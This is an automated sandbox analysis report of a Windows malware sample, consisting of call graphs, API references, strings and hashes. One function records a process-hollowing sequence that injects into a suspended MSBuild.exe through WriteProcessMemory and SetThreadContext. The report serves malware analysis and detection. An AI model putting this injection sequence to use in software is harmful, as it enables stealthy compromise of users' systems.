15177->15179 15180 e924e3 15178->15180 15179->15156 15181 e92d0a std::_Lockit::~_Lockit 2 API calls 15180->15181 15181->15182 15182->15177 15184 e925bf 15183->15184 15185 e92563 15183->15185 15186 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 15184->15186 15185->15184 15188 e92952 std::ios_base::_Init 16 API calls 15185->15188 15187 e9247b 15186->15187 15187->15163 15187->15164 15189 e92573 15188->15189 15273 e925fa 15189->15273 15196 e9c994 _Yarn 15 API calls 15195->15196 15197 e92d88 15196->15197 15198 e92d8f 15197->15198 15390 e931b3 15197->15390 15198->15157 15202 e9b78c 15201->15202 15203 e92d14 15201->15203 15395 e9b767 LeaveCriticalSection 15202->15395 15205 e92d27 15203->15205 15394 e95206 LeaveCriticalSection 15203->15394 15205->15160 15206 e9b793 15206->15160 15209 e925fa 15208->15209 15210 e95aba Concurrency::cancel_current_task RaiseException 15208->15210 15211 e92cd9 std::_Lockit::_Lockit 7 API calls 15209->15211 15210->15209 15212 e9260b 15211->15212 15213 e92635 15212->15213 15214 e92647 15212->15214 15215 e92dff codecvt 65 API calls 15213->15215 15216 e931f0 codecvt 31 API calls 15214->15216 15217 e924c1 15215->15217 15218 e92651 15216->15218 15225 e9f432 15219->15225 15224->15173 15226 e9f5b9 std::_Lockit::_Lockit 5 API calls 15225->15226 15227 e9f437 15226->15227 15246 e9f5d3 15227->15246 15245 e9f464 15245->15245 15247 e9f534 std::_Lockit::_Lockit 5 API calls 15246->15247 15248 e9f43c 15247->15248 15249 e9f5ed 15248->15249 15250 e9f534 std::_Lockit::_Lockit 5 API calls 15249->15250 15251 e9f441 15250->15251 15252 e9f607 15251->15252 15253 e9f534 std::_Lockit::_Lockit 5 API calls 15252->15253 15254 e9f446 15253->15254 15255 e9f621 15254->15255 15256 e9f534 std::_Lockit::_Lockit 5 API calls 15255->15256 15257 e9f44b 15256->15257 15258 e9f63b 15257->15258 15259 e9f534 std::_Lockit::_Lockit 5 API calls 15258->15259 15260 e9f450 15259->15260 15261 e9f655 15260->15261 15262 e9f534 std::_Lockit::_Lockit 5 API calls 15261->15262 15263 e9f455 15262->15263 15264 e9f66f 15263->15264 15265 e9f534 std::_Lockit::_Lockit 5 API calls 15264->15265 15266 e9f45a 15265->15266 15267 e9f689 15266->15267 15268 e9f534 std::_Lockit::_Lockit 5 API calls 15267->15268 15269 e9f45f 15268->15269 15270 e9f6a3 15269->15270 15271 e9f534 std::_Lockit::_Lockit 5 API calls 15270->15271 15272 e9f6b9 15271->15272 15272->15245 15274 e92cd9 std::_Lockit::_Lockit 7 API calls 15273->15274 15275 e9260b 15274->15275 15276 e92635 15275->15276 15277 e92647 15275->15277 15309 e92dff 15276->15309 15318 e931f0 15277->15318 15282 e94915 15353 e98588 15282->15353 15325 e9c99f 15309->15325 15313 e92e24 15314 e92e33 15313->15314 15315 e9c99f std::_Locinfo::_Locinfo_dtor 64 API calls 15313->15315 15316 e92e65 _Yarn 15 API calls 15314->15316 15315->15314 15317 e9259b 15316->15317 15317->15282 15344 e93292 15318->15344 15321 e95aba Concurrency::cancel_current_task RaiseException 15322 e9320f 15321->15322 15347 e91918 15322->15347 15326 e9f432 std::_Lockit::_Lockit 5 API calls 15325->15326 15327 e9c9ac 15326->15327 15336 e9cbd1 15327->15336 15330 e92e65 15331 e92e73 15330->15331 15335 e92e9e _Yarn 15330->15335 15332 e92e7f 15331->15332 15333 e9c522 _Yarn 14 API calls 15331->15333 15334 e9c994 _Yarn 15 API calls 15332->15334 15332->15335 15333->15332 15334->15335 15335->15313 15337 e9cbdd ___scrt_is_nonwritable_in_current_image 15336->15337 15338 e9b750 std::_Lockit::_Lockit EnterCriticalSection 15337->15338 15339 e9cbeb 15338->15339 15340 e9ca72 std::_Locinfo::_Locinfo_dtor 64 API calls 15339->15340 15341 e9cbf8 15340->15341 15342 e9cc20 std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 15341->15342 15343 e92e0c 15342->15343 15343->15330 15350 e93155 15344->15350 15348 e96097 ___std_exception_copy 30 API calls 15347->15348 15349 e9193a 15348->15349 15351 e96097 ___std_exception_copy 30 API calls 15350->15351 15352 e93181 15351->15352 15352->15321 15354 e9e783 _unexpected 39 API calls 15353->15354 15355 e98593 15354->15355 15356 e9ed66 __Getctype 39 API calls 15355->15356 15357 e985a3 15356->15357 15391 e931c1 Concurrency::cancel_current_task 15390->15391 15392 e95aba Concurrency::cancel_current_task RaiseException 15391->15392 15393 e931cf 15392->15393 15394->15205 15395->15206 15397 e95aba Concurrency::cancel_current_task RaiseException 15396->15397 15398 e918b4 15397->15398 15399 e96097 ___std_exception_copy 30 API calls 15398->15399 15400 e918d6 15399->15400 15400->14756 15406 e93258 15401->15406 15404 e95aba Concurrency::cancel_current_task RaiseException 15405 e931ef 15404->15405 15407 e93155 std::exception::exception 30 API calls 15406->15407 15408 e931e1 15407->15408 15408->15404

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00EB5110,00EB5100), ref: 00EB5334
                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00EB5347
                                                                                                                                • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 00EB5365
                                                                                                                                • ReadProcessMemory.KERNELBASE(00000088,?,00EB5154,00000004,00000000), ref: 00EB5389
                                                                                                                                • VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 00EB53B4
                                                                                                                                • WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 00EB540C
                                                                                                                                • WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 00EB5457
                                                                                                                                • WriteProcessMemory.KERNELBASE(00000088,?,?,00000004,00000000), ref: 00EB5495
                                                                                                                                • Wow64SetThreadContext.KERNEL32(0000008C,01590000), ref: 00EB54D1
                                                                                                                                • ResumeThread.KERNELBASE(0000008C), ref: 00EB54E0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                • API String ID: 2687962208-3857624555
                                                                                                                                • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                • Instruction ID: b8b006fb95828e9b6610b2e95e4aaad224117086ba890a6e1987b39585d6249b
                                                                                                                                • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                • Instruction Fuzzy Hash: 2EB1087260168AAFDB60CF68CC80BDA73A5FF88714F158124EA0CAB341D774FA51CB94

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E91098: _strlen.LIBCMT ref: 00E910F9
                                                                                                                                • CreateFileA.KERNELBASE ref: 00E91675
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00E91685
                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00E916AB
                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00E916BA
                                                                                                                                • _strlen.LIBCMT ref: 00E91705
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00E91805
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2911764282-0
                                                                                                                                • Opcode ID: 025b09162ac51c656a73a92316f0b2c157df0c03c8ef2c4114bc6a124ec30df0
                                                                                                                                • Instruction ID: 98f428fce44142ee893f4e90e44745bb8fbf42e4d5a882982cdaecccf1da6007
                                                                                                                                • Opcode Fuzzy Hash: 025b09162ac51c656a73a92316f0b2c157df0c03c8ef2c4114bc6a124ec30df0
                                                                                                                                • Instruction Fuzzy Hash: 3E51FEB19043029BCB14AF24DC85B6BBBE5FF89348F155A2DF889A3251E73499488B52

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E91098: _strlen.LIBCMT ref: 00E910F9
                                                                                                                                • FreeConsole.KERNELBASE ref: 00E9158B
                                                                                                                                  • Part of subcall function 00E9123B: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 00E912C7
                                                                                                                                • VirtualProtect.KERNELBASE(00EB5011,00000549,00000040,?), ref: 00E915D7
                                                                                                                                • ExitProcess.KERNEL32 ref: 00E9160E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConsoleDispatcherExceptionExitFreeProcessProtectUserVirtual_strlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2898289550-0
                                                                                                                                • Opcode ID: 1d4e325c9aa6a262f3e75d902086da18b6f5f3f73738077acf6542ecc0d0a8a7
                                                                                                                                • Instruction ID: 34bb00492d3ece07588653e98c513f6bf1c191619b1bdcb39175e8389c1a0e71
                                                                                                                                • Opcode Fuzzy Hash: 1d4e325c9aa6a262f3e75d902086da18b6f5f3f73738077acf6542ecc0d0a8a7
                                                                                                                                • Instruction Fuzzy Hash: D111E372A002096BEB00BBA59C43BFF73A8EF84700F404065F908B7291EA75A9054BE1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 94 e9123b-e91261 95 e91263-e9127c 94->95 95->95 96 e9127e-e91280 95->96 97 e91282-e912ac 96->97 97->97 98 e912ae-e912b6 97->98 99 e912bc-e912c0 98->99 100 e91355-e9136d call e929c6 98->100 101 e912c2-e912df KiUserExceptionDispatcher 99->101 104 e912fc-e9134f 101->104 105 e912e1-e912eb call e9136e 101->105 104->100 104->101 107 e912f0-e912f9 call e91533 105->107 107->104
                                                                                                                                APIs
                                                                                                                                • KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 00E912C7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                                • String ID: [+]
                                                                                                                                • API String ID: 6842923-4228040803
                                                                                                                                • Opcode ID: d5a4edd53428f17cd7d5e1ce4617881bb508480edfe32c72202d296110852d22
                                                                                                                                • Instruction ID: eb4d9e6940de53cf90754dd0a2faa52d62f9427a192545ed2f795eecda9f3a7f
                                                                                                                                • Opcode Fuzzy Hash: d5a4edd53428f17cd7d5e1ce4617881bb508480edfe32c72202d296110852d22
                                                                                                                                • Instruction Fuzzy Hash: 80312B3160C3C14FDB26AB3468997EBBBD0AFBD318F1909BDD8C997243D1615446CB62

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 110 ea5283-ea52a5 111 ea52ab-ea52ad 110->111 112 ea5498 110->112 113 ea52d9-ea52fc 111->113 114 ea52af-ea52ce call e9b601 111->114 115 ea549a-ea549e 112->115 117 ea52fe-ea5300 113->117 118 ea5302-ea5308 113->118 121 ea52d1-ea52d4 114->121 117->118 120 ea530a-ea531b 117->120 118->114 118->120 122 ea532e-ea533e call ea55b0 120->122 123 ea531d-ea532b call ea4033 120->123 121->115 128 ea5340-ea5346 122->128 129 ea5387-ea5399 122->129 123->122 132 ea5348-ea534b 128->132 133 ea536f-ea5385 call ea562d 128->133 130 ea539b-ea53a1 129->130 131 ea53f0-ea5410 WriteFile 129->131 139 ea53dc-ea53e9 call ea5a5c 130->139 140 ea53a3-ea53a6 130->140 136 ea541b 131->136 137 ea5412-ea5418 GetLastError 131->137 134 ea534d-ea5350 132->134 135 ea5356-ea5365 call ea59f4 132->135 151 ea5368-ea536a 133->151 134->135 141 ea5430-ea5433 134->141 135->151 145 ea541e-ea5429 136->145 137->136 150 ea53ee 139->150 146 ea53c8-ea53da call ea5c20 140->146 147 ea53a8-ea53ab 140->147 154 ea5436-ea5438 141->154 152 ea542b-ea542e 145->152 153 ea5493-ea5496 145->153 157 ea53c3-ea53c6 146->157 147->154 155 ea53b1-ea53be call ea5b37 147->155 150->157 151->145 152->141 153->115 158 ea543a-ea543f 154->158 159 ea5466-ea5472 154->159 155->157 157->151 163 ea5458-ea5461 call e9adf9 158->163 164 ea5441-ea5453 158->164 161 ea547c-ea548e 159->161 162 ea5474-ea547a 159->162 161->121 162->112 162->161 163->121 164->121
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00EA562D: GetConsoleOutputCP.KERNEL32(8040FA0D,00000000,00000000,?), ref: 00EA5690
                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00E9BBF3,?), ref: 00EA5408
                                                                                                                                • GetLastError.KERNEL32(?,?,00E9BBF3,?,00E9BE37,00000000,?,00000000,00E9BE37,?,?,?,00EB4628,0000002C,00E9BD23,?), ref: 00EA5412
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2915228174-0
                                                                                                                                • Opcode ID: a1018f3d0de75daccd8e95f32c91ac1e73fc2857d0577d3b2c52e172036c9048
                                                                                                                                • Instruction ID: c7a9f02a21148fc939da3dece07de34f65f96c5294a93905d852695bcdd9649a
                                                                                                                                • Opcode Fuzzy Hash: a1018f3d0de75daccd8e95f32c91ac1e73fc2857d0577d3b2c52e172036c9048
                                                                                                                                • Instruction Fuzzy Hash: 5261B272D00609AFDF11CFA8D845AEEBBF9AF4E308F141195E811BB216D371E945CB60

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 167 ea5a5c-ea5ab1 call e956e0 170 ea5ab3 167->170 171 ea5b26-ea5b36 call e929c6 167->171 172 ea5ab9 170->172 174 ea5abf-ea5ac1 172->174 176 ea5adb-ea5b00 WriteFile 174->176 177 ea5ac3-ea5ac8 174->177 180 ea5b1e-ea5b24 GetLastError 176->180 181 ea5b02-ea5b0d 176->181 178 ea5aca-ea5ad0 177->178 179 ea5ad1-ea5ad9 177->179 178->179 179->174 179->176 180->171 181->171 182 ea5b0f-ea5b1a 181->182 182->172 183 ea5b1c 182->183 183->171
                                                                                                                                APIs
                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00EA53EE,00000000,00E9BE37,?,00000000,?,00000000), ref: 00EA5AF8
                                                                                                                                • GetLastError.KERNEL32(?,00EA53EE,00000000,00E9BE37,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00E9BBF3), ref: 00EA5B1E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 442123175-0
                                                                                                                                • Opcode ID: b1b330dc925f1a6f2744d0cc3ca3ee590556bc32c325d932be79be02154b6a5e
                                                                                                                                • Instruction ID: cdc769cf5da34fc6ebfe55ebf038cc2679f6d7a1d8305cfcccffc369192eaeb7
                                                                                                                                • Opcode Fuzzy Hash: b1b330dc925f1a6f2744d0cc3ca3ee590556bc32c325d932be79be02154b6a5e
                                                                                                                                • Instruction Fuzzy Hash: 13218032A002199FCF15CF29DD809EDB7B9EF5D305F2441A9E906EB211D630AE46CB60

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 184 e9ff89-e9ff8e 185 e9ff90-e9ffa8 184->185 186 e9ffaa-e9ffae 185->186 187 e9ffb6-e9ffbf 185->187 186->187 188 e9ffb0-e9ffb4 186->188 189 e9ffd1 187->189 190 e9ffc1-e9ffc4 187->190 192 ea002b-ea002f 188->192 191 e9ffd3-e9ffe0 GetStdHandle 189->191 193 e9ffcd-e9ffcf 190->193 194 e9ffc6-e9ffcb 190->194 195 ea000d-ea001f 191->195 196 e9ffe2-e9ffe4 191->196 192->185 197 ea0035-ea0038 192->197 193->191 194->191 195->192 199 ea0021-ea0024 195->199 196->195 198 e9ffe6-e9ffef GetFileType 196->198 198->195 200 e9fff1-e9fffa 198->200 199->192 201 e9fffc-ea0000 200->201 202 ea0002-ea0005 200->202 201->192 202->192 203 ea0007-ea000b 202->203 203->192
                                                                                                                                APIs
                                                                                                                                • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00E9FE78,00EB4948), ref: 00E9FFD5
                                                                                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00E9FE78,00EB4948), ref: 00E9FFE7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileHandleType
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3000768030-0
                                                                                                                                • Opcode ID: 11b98b8a7183ca129ffbcd18fa6ee619d5435b0a3dda566927286a80f12e6e17
                                                                                                                                • Instruction ID: b5cb61acf2f45504904ef6eb3d547a1dca997a6cce2954fadd88d408528a0e4d
                                                                                                                                • Opcode Fuzzy Hash: 11b98b8a7183ca129ffbcd18fa6ee619d5435b0a3dda566927286a80f12e6e17
                                                                                                                                • Instruction Fuzzy Hash: 7A11B7716047114ACB304E3E9CC87237A95A75B338B341B1AD1B6FA5F1C330E946D240

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 204 e9136e-e913b1 call e9ce80 call e9197e 209 e914c9-e914ce 204->209 210 e913b7-e913fa 204->210 213 e914f0-e91532 call e91ab6 call e91a10 call e929c6 209->213 211 e913fc-e91404 210->211 212 e9144e-e91463 call e9408b 210->212 211->212 215 e91406-e91409 211->215 217 e91466-e9147b 212->217 218 e9140d-e91425 call e919d8 215->218 220 e9147d-e91485 217->220 221 e914c0-e914c7 217->221 227 e9142b-e91442 218->227 228 e914d0-e914d5 218->228 220->221 225 e91487-e91489 220->225 226 e914e0-e914ec 221->226 230 e9148a-e914a5 call e919d8 225->230 226->213 227->218 231 e91444-e9144c 227->231 228->226 235 e914d7-e914dc 230->235 236 e914a7-e914be 230->236 231->212 235->226 236->221 236->230
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _strlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4218353326-0
                                                                                                                                • Opcode ID: c1ede9731a4cae8a9ba4361f7f725261e95b0344136c98bd6ff067b194f7e541
                                                                                                                                • Instruction ID: d2bef6d8d7852ae33f77d2c503b21f2b9c9837c17093d3322aea6ab2f1344864
                                                                                                                                • Opcode Fuzzy Hash: c1ede9731a4cae8a9ba4361f7f725261e95b0344136c98bd6ff067b194f7e541
                                                                                                                                • Instruction Fuzzy Hash: CA5180353042058FCB14DF6CC994B6A77D6EB88328F1986ACE969DB392D630ED05CB41

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 238 e93c29-e93c43 239 e93c4c-e93c54 238->239 240 e93c45-e93c47 238->240 242 e93c75-e93c79 239->242 243 e93c56-e93c60 239->243 241 e93d25-e93d32 call e929c6 240->241 246 e93c7f-e93c90 call e944b9 242->246 247 e93d21 242->247 243->242 250 e93c62-e93c73 243->250 254 e93c98-e93ccc 246->254 255 e93c92-e93c96 246->255 248 e93d24 247->248 248->241 253 e93cee-e93cf0 250->253 253->248 261 e93cce-e93cd1 254->261 262 e93cf2-e93cfa 254->262 256 e93cdf call e935da 255->256 259 e93ce4-e93ceb 256->259 259->253 261->262 263 e93cd3-e93cd7 261->263 264 e93cfc-e93d0d call e9c578 262->264 265 e93d0f-e93d1f 262->265 263->247 267 e93cd9-e93cdc 263->267 264->247 264->265 265->248 267->256
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
